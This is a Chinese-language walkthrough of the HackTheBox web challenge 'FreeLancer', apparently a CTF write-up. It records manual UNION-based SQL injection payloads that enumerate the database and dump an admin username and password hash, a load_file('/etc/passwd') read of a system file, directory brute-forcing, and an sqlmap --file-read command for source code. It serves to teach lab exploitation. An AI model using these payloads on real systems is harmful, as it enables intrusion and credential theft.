FreeLancer
信息收集
第一次玩htb,随便开道web试试
看样子是个人搭建的博客
多的不说了,dirsearch扫一下,发现有mail目录信息泄露,访问后发现其目录下有contact_me.php文件,但是访问500
页面上只有一个contact的功能,抓下包发现访问的即是contact_me.php
证明考点可能是在这了
但是无论怎么测试发现都是返回500,这里思路断了。
查看下源码,发现有hint
这还不是sql注入?我当场吃掉
sql注入
sqlmap跑的太慢了,直接手注了
?id=-1%20union%20select%201,database(),3
//freelancer
?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=‘freelancer‘
//portfolio,safeadmin
?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=‘freelancer‘ and table_name=‘safeadmin‘
//id,username,password,created_at
?id=-1 union select 1,group_concat(username),3 from freelancer.safeadmin
username:safeadm
password:$2y$10$s2ZCi/tHICnA97uf4MfbZuhmOZQXdCnrM9VM9LBMHPp68vAXNRf4K
密码值无从得知,然后数据库里没找到flag
这里本来想写shell到mail目录下,可能开了权限,有waf,目录不对什么的把,写不进去
先读一下目录吧,确定目录是对的,那可能就是权限问题无法写shell了
再尝试读其他地方
-1%20union%20select%201,load_file(%27/etc/passwd%27),3
这里思路又断了,每次思路断了我就掏出我的超级无敌大字典,爆它鸭的
爆出路径/administrat
访问发现需要登陆,这里有两种方法,带入数据库查询或,直接sqlmap读源码都可
sqlmap读源码
--file-read=/var/www/html/administrat/panel.php